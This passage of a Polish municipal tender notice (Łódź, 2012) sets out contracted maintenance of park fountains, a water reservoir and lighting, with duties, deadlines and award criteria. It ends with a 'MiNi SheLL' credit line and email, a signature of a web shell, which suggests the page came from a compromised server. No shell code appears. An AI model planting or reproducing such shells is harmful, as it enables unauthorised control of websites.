2.Utrzymanie w sprawności zbiornika wodnego w Parku Staromiejskim 
Podstawowy zakres prac:
- odbiór i transport pompy z Leśnictwa Miejskiego w Łodzi przy ul. Łagiewnickiej 305
- montaż pompy (otrzymanej od Zamawiającego),
-stały nadzór i bieżąca obsługa w celu utrzymania w dobrym stanie i sprawności urządzeń   zbiornika oraz bieżąca obsługa obiektów urządzeń,
-  napełnianie zbiornika wodą z ujęcia studni głębinowej w sezonie wiosennym, letnim i jesiennym w miarę potrzeb,
- oczyszczenie studni przelewowej w sezonie wiosennym, letnim i jesiennym,
- sprawdzanie działania przelewów dopływowych i obiegu wody oraz poziomu wody 
w zbiorniku i korycie,
- sprawdzanie działania i okresowa regulacja wyłącznika zegara czasu pracy studni głębinowej stosownie do aktualnych i prognozowanych wartości pogody oraz planowego dobowego czasu działania obiegu wody,
- sprawdzanie ciągłości pracy i wydatku pompowni wody obiegowej na podstawie natężenia przelewu ze studni,
- sprawdzanie stanu ogólnego koryta rzeki i otoczenia zbiornika,
- sprawdzanie stanu terenu przyległego do zbiornika z uwagi na drożność i umocnienia trawiaste oraz sprawdzanie bruzd spływu wód opadowych,
- oczyszczanie przelewu zbiornika głównego i rzeczki przelewowej (śmieci i odpady 
z drzew),
- czyszczenie kratek wpustów deszczowych,
- czyszczenie kraty wlewu i przelewu ulgowego z rzeczki do studni,
- czyszczenie kraty wlotowej na ujściu pompowni przelewowej,
-ograniczenie działania obiegu wody do godzin dziennych każdorazowo przy zachowaniu zasilania i automatycznego sterowania pompowni polegać będzie na wyłączaniu pompowni wody obiegowej i zamykaniu zastawki przelewu zbiornika,
-włączanie obiegu - otwieranie zastawki przelewu,
-wyłączanie i włączanie pompy studni głębinowej w miarę potrzeb,
-oczyszczanie kraty na wlocie spustu,
-obsługa studni i zasuwy regulującej stopień napełnienia studzienki rewizyjnej,
-konserwacja zasuw i ich obsługa na przewodzie odpływowym drenażu dna koryta rzeki,
-unieruchomienie zastawki w pozycji zamknięcia,
-konserwacja zasuw na wszystkich rurociągach tak zasilających jak i spustowych,
-czyszczenie rurociągu zasilającego od pompy do zbiornika głównego,
-czyszczenie rurociągu przelewowego od studzienki przelewowej do zbiornika głównego,
-naprawy i konserwacja zaworu zwrotnego w studzience przepompowej,
-konserwacja zasuwy głównej w studzience przelewowej, 
-spuszczanie wody ze zbiornika pod stałym nadzorem, 
-oczyszczanie w miarę potrzeb krat wlotu spustu i przelewu spustowego,
-czyszczenie rurociągu spustowego wody ze zbiornika wodnego do kanalizacji podczas spuszczania wody w celu przygotowania zbiornika do zimy,
-zdemontowanie pompy w pompowni wody obiegowej w terminie do 31.10.2012 r. i dostarczenie do siedziby Wydziału Ochrony Środowiska i Rolnictwa UMŁ ul. Tymienieckiego 5 lub inne miejsce wskazane przez Zamawiającego (zdemontowana, zakonserwowana pompa winna zostać dostarczona przez Wykonawcę w dobrym stanie technicznym, umożliwiającym ich ponowne użytkowanie przez Zamawiającego),
-każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii urządzeń obsługujących zbiornik wodny,
-przyjmowanie zgłoszeń od Zamawiającego o wystąpieniu awarii,
- usuwanie awarii w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu,
- zapewnienie całodobowego kontaktu telefonicznego we wszystkie dni tygodnia w sytuacjach awaryjnych i gotowości do szybkiego usunięcia awarii.
Usluga świadczona w okresie: 01.05.2012 - 31.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Obsługa i konserwacja fontann i sztucznych zbiorników wodnych  w parkach na terenie Widzewa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa i konserwacja fontann i sztucznych zbiorników wodnych w niżej określonym zakresie:
1. Podstawowy zakres prac :
a) bieżąca konserwacja  urządzeń elektrycznych i wodno -kanalizacyjnych:
- dwóch fontann: w Parku Podolskim przy ul. Tatrzańskiej i Parku 3 - go Maja przy  ul. Małachowskiego
- studni głębinowej  w Parku Widzewskim przy Al. Piłsudskiego / ul. Niciarnianej;
b) utrzymanie w czystości lustra wody i niecek dwóch ww. wymienionych fontann wraz z wymianą wody;
c) utrzymanie w czystości lustra wody i niecek dwóch sztucznych zbiorników wodnych w Parku Źródliska I wraz z wymianą wody;
d) kontrola poziomu i uzupełnienie wody w stawach w parku:
- Widzewskim;
- Źródliska I;
- Źródliska II.
e) odczytywanie wskazań liczników energetycznych i wodomierzy oraz przekazywanie tych informacji w formie pisemnej Zamawiającemu na koniec miesiąca wraz z fakturą, w rozbiciu na poszczególne obiekty i urządzenia;
2. Do obowiązków Wykonawcy należeć będzie:
- sprawdzenie i udrożnienie kanalizacji przy fontannach ( na odcinku od fontanny do pierwszej studzienki kanalizacyjnej ) oraz sprawdzenie i usunięcie nadmiaru wody ze sterówki studni głębinowej przed sezonem wiosenno - letnim;
- odbiór i transport pompy z Leśnictwa Miejskiego w Łodzi przy ul. Łagiewnickiej 305
- montaż pompy w Parku Podolskim, 
- wykonanie ( w dniu rozpoczęcia świadczenia usługi ) pomiarów rezystancji izolacji kabli, przewodów, uziemienia oraz ochrony przeciwpożarowej izolacji. Protokoły z tych pomiarów Wykonawca przekaże Zamawiającemu w terminie 10 dni od rozpoczęcia prac konserwacyjnych; 
- oczyszczenie niecek  fontann z zanieczyszczeń, napełnienie wodą i uruchomienie;
- wymiana wody po uprzednim oczyszczeniu niecek fontann w trakcie sezonu w terminach uzgodnionych  z Zamawiającym, uzależnionych od temperatury i czystości wody (około 12 razy w sezonie, w każdej z fontann i w zbiornikach wodnych);
- utrzymanie czystości lustra wody dwóch fontann i  dwóch sztucznych zbiorników wodnych,
- przeglądy i konserwacja urządzeń wodno - kanalizacyjnych;
- przeglądy, konserwacja i oczyszczanie szafek pomiarowo - rozdzielczych i urządzeń sterujących;
- kontrola sprawności urządzeń sterujących ( czas uruchomiania i wyłączania fontann );
- kontrola sprawności urządzeń sterujących zasilaniem studni głębinowej;
- udrażnianie i dorabianie dysz,
- wymiana uszczelek i bezpieczników,
- kontrola i uzupełnienie poziomu wody w stawie w parku Widzewskim (studnia głębinowa) oraz w parku Źródliska I i Źródliska II (studzienki wodomierzowe),
- pozostawienie drożnej kanalizacji (na odcinku od fontanny do pierwszej studzienki kanalizacyjnej ) i zabezpieczenie urządzeń na okres zimowy; 
- każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii oraz dyspozycyjność w przypadku konieczności jej usunięcia, bądź zabezpieczenia urządzeń i obiektów  towarzyszących,
- przyjmowanie zgłoszeń od Zamawiającego o wystąpieniu awarii,
- usuwanie awarii w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu,
-zapewnienie całodobowego kontaktu telefonicznego we wszystkie dni tygodnia w sytuacjach   awaryjnych i gotowości do szybkiego usunięcia awarii,
- włączanie fontann o godz.8:00 i wyłączanie o godz. 20:00 oraz interwencyjnie na telefoniczne zlecenie pracownika Wydziału Ochrony Środowiska i Rolnictwa UMŁ w razie  zaistnienia takiej  konieczności,
- demontaż pompy z parku  Podolskiego w terminie do 31.10.2012 r. i  dostarczenie do siedziby Wydziału Ochrony Środowiska i Rolnictwa UMŁ ul. Tymienieckiego 5 lub inne miejsce wskazane przez Zamawiającego (zdemontowana, zakonserwowana pompa winna zostać dostarczona przez Wykonawcę w dobrym stanie technicznym, umożliwiającym ich ponowne użytkowanie przez Zamawiającego).
Okres świadczenia usługi: 01.05.2012 - 31.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Obsługa i konserwacja fontann w parkach na terenie Górnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa i konserwacja fontann w parkach w niżej określonym zakresie:
Zakres prac dla fontanny Św. Faustyna czerpiąca ze źródła Miłosierdzia na pl. Niepodległości: 
- montaż 6 lamp basenowych złożonych w pomieszczeniu pod fontanną;
-dokonywanie bieżących przeglądów i konserwacji we wszystkie robocze dni tygodnia; usługa obejmuje: kontrolę i czyszczenie niecki górnej, basenu dolnego, krat czerpalnych, pomnika Św. Faustyny, regulowanie poziomu wysokości wody w niecce, uzupełnianie substancji chemicznych oraz innych materiałów niezbędnych do funkcjonowania fontanny  zgodnie z instrukcją obsługi, która zostanie przekazana Wykonawcy po podpisaniu umowy;
-wymiana zużytych, skradzionych i uszkodzonych źródeł światła tj. wszystkich żarówek i bezpieczników wraz z materiałami;
-uzupełnianie zużytych części np. uszczelek;
-usuwanie awarii (również w dni wolne od pracy) w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu lub w wypadku zagrożenia zdrowia lub życia, natychmiastowe odłączanie napięcia i naprawa urządzeń w możliwie najkrótszym terminie;
-zabezpieczeniu obiektu na okres zimy (w tym wymontowanie i zakonserwowanie 6 lamp basenowych oraz złożenie w miejscu wskazanym przez Zamawiającego);
-dostosowanie godzin pracy fontanny do pory roku, tj. od wschodu Słońca do północy;
-comiesięczne odczytywanie wskazań liczników w ww. obiektach i przekazywanie pisemnej informacji do Wydziału Ochrony Środowiska i Rolnictwa w Departamencie Infrastruktury i Lokali UMŁ na koniec każdego miesiąca wraz z fakturą;
-każdorazowe niezwłoczne zgłaszanie Zamawiającemu uszkodzeń i awarii (telefonicznie, e-mailem, faxem), a następnie potwierdzenie zgłoszeniem pisemnym,
- składanie Zamawiającemu pisemnych sprawozdań z wykonywanych prac zawierających  informację o stanie urządzeń i zużyciu energii elektrycznej i wody - 1 raz w miesiącu, a w przypadku awarii i dewastacji zagrażających bezpieczeństwu natychmiastowe zgłoszenie Zamawiającemu telefonicznie lub mailowo.
Zakres prac dla fontanny na stawie w Parku im. Reymonta: 
-  odbiór pomp z siedziby Leśnictwa Miejskiego-Łódź z/s w Łodzi przy ul. Łagiewnickiej 305 i ich montaż;
-  zabezpieczenie urządzeń na okres zimowy (w tym wymontowanie i zakonserwowanie pompy oraz złożenie w miejscu wskazanym przez Zamawiającego);
-dokonywanie bieżących przeglądów i konserwacji instalacji 2 x w tyg. w poniedziałki i piątki; usługa obejmuje: kontrolę i czyszczenie kraty czerpalnej oraz rękawa filtrującego, regulowanie poziomu wysokości wody w stawie;
-uzupełnianie zużytych części np. uszczelek, bezpieczników;
-usuwanie awarii (również w dni wolne od pracy) w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu lub w wypadku zagrożenia zdrowia lub życia, natychmiastowe odłączanie napięcia i naprawa urządzeń w możliwie najkrótszym terminie;
-dostosowanie godzin pracy fontanny do pory roku, tj. od wschodu do zachodu Słońca;
-comiesięczne odczytywanie wskazań liczników w ww. obiektach i przekazywanie pisemnej informacji do Wydziału Ochrony Środowiska i Rolnictwa w Departamencie Infrastruktury i Lokali UMŁ na koniec każdego miesiąca wraz z fakturą;
-każdorazowe niezwłoczne zgłaszanie Zamawiającemu uszkodzeń i awarii (telefonicznie, e-mailem, faxem), a następnie potwierdzenie zgłoszeniem pisemnym,
- składanie Zamawiającemu pisemnych sprawozdań z wykonywanych prac zawierających  informację o stanie urządzeń i zużyciu energii elektrycznej i wody - 1 raz w miesiącu, a w przypadku awarii i dewastacji zagrażających bezpieczeństwu natychmiastowe zgłoszenie Zamawiającemu tel. 638-47-16, fax. 638-47-47 lub mailowo.
Zakres prac dla fontanny na Skwerze im. H. Dubaniewicza: 
- odbiór pomp z siedziby Leśnictwa Miejskiego-Łódź z/s w Łodzi przy ul. Łagiewnickiej 305 i ich montaż;
- zabezpieczenie urządzeń na okres zimowy (w tym wymontowanie i zakonserwowanie pompy oraz złożenie w miejscu wskazanym przez Zamawiającego);
-dokonywanie bieżących przeglądów i konserwacji instalacji 2 x w tyg. w poniedziałki i piątki; usługa obejmuje: kontrolę i czyszczenie kraty czerpalnej oraz usuwanie na bieżąco zanieczyszczeń z niecki, regulowanie poziomu wysokości wody w niecce, mycie niecki;
-uzupełnianie zużytych części np. uszczelek, bezpieczników;
-usuwanie awarii (również w dni wolne od pracy) w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu lub w wypadku zagrożenia zdrowia lub życia, natychmiastowe odłączanie napięcia i naprawa urządzeń w możliwie najkrótszym terminie;
-dostosowanie godzin pracy fontanny do pory roku, tj. od wschodu do zachodu Słońca;
-comiesięczne odczytywanie wskazań liczników w ww. obiektach i przekazywanie pisemnej informacji do Wydziału Ochrony Środowiska i Rolnictwa w Departamencie Infrastruktury i Lokali UMŁ na koniec każdego miesiąca wraz z fakturą;
-każdorazowe niezwłoczne zgłaszanie Zamawiającemu uszkodzeń i awarii (telefonicznie, e-mailem, faxem), a następnie potwierdzenie zgłoszeniem pisemnym,
- składanie Zamawiającemu pisemnych sprawozdań z wykonywanych prac zawierających  informację o stanie urządzeń i zużyciu energii elektrycznej i wody - 1 raz w miesiącu, a w przypadku awarii i dewastacji zagrażających bezpieczeństwu natychmiastowe zgłoszenie Zamawiającemu tel. 638-47-16, fax. 638-47-47 lub mailowo.
Zakres i charakterystyka przedmiotu zamówienia
Przedmiot zamówienia obejmuje prace polegające na utrzymaniu w należytym stanie technicznym urządzeń iluminacyjnych, zapewniającym sprawność urządzeń elektrycznych.
Do obowiązków Wykonawcy należy:
1.sprawdzanie działania wyłączników przeciwporażeniowych,
2.oględziny oświetlenia tj. stanu widocznych części przewodów, ich połączeń
i osprzętu, stanu czystości urządzeń oświetleniowych, poprawności zaprogramowania i działania ręcznego przełącznika czasowego, stanu ochrony przeciwpożarowej, stanu urządzeń sterowniczych i zabezpieczających w tablicy TPS, stanu napisów informacyjnych, ostrzegawczych, opisów i oznaczeń,
3.wymiana zużytych i uszkodzonych źródeł światła tj. wszystkich żarówek
i bezpieczników wraz z zakupem ww. materiałów,
4.wymiana zużytych, uszkodzonych układów zapłonowych, stateczników
w oprawach i projektorach wraz z zakupem ww. materiałów,
5.wymiana uszkodzonych i skradzionych drzwiczek i pokryw słupowych wraz
z zakupem ww. materiałów,
6.wymiana uszkodzonych opraw i szkieł w oprawach i projektorach wraz z zakupem ww. materiałów,
7.wymiana uszkodzonych bądź wadliwych zabezpieczeń zwarciowych, różnicowo-prądowych, ochronników przeciwprzepięciowych i zegarów sterujących wraz
z zakupem ww. materiałów,
8.umycie wszystkich opraw oświetleniowych po zimie do 30 maja 2012 roku,
9.malowanie raz w roku słupów nośnych farbą Noxyde Antistatic lub równoważną wraz z zakupem ww. materiału,
10.stała kontrola sprawności oświetlenia w godzinach załączania tj. w godzinach wieczornych i nocnych,
11.każdorazowe zgłaszanie Zamawiającemu uszkodzeń i awarii - telefonicznie
i pisemnie,
12.usuwanie awarii oświetlenia (również w dni wolne od pracy) w ciągu 24 godzin od powzięcia wiadomości o jej zaistnieniu lub w wypadku bardzo poważnych uszkodzeń natychmiastowe odłączenie napięcia i naprawa urządzeń w możliwie najkrótszym terminie spowodowane:
a)działaniem osób trzecich - poprzez zabezpieczenie dostępu do instalacji pod napięciem,
b)naturalnym uszkodzeniem układu - zabezpieczenia poprzez natychmiastowe odłączenie napięcia i naprawa urządzeń w możliwie najkrótszym czasie,
13.zapewnienie sterowania ręcznego oświetlenia w przypadku awarii przełącznika mechanicznego,
14.okresowe ustawianie zegarów sterujących włączaniem i wyłączaniem oświetlenia w zależności od długości dnia i wskazań Zamawiającego,
15.składanie Zamawiającemu pisemnych sprawozdań z wykonywanych prac zawierających informację o stanie technicznym urządzeń i zużyciu energii elektrycznej jeden raz w miesiącu.
Okres świadczenie usługi: 01.05.2012 - 31.10.2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.80.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com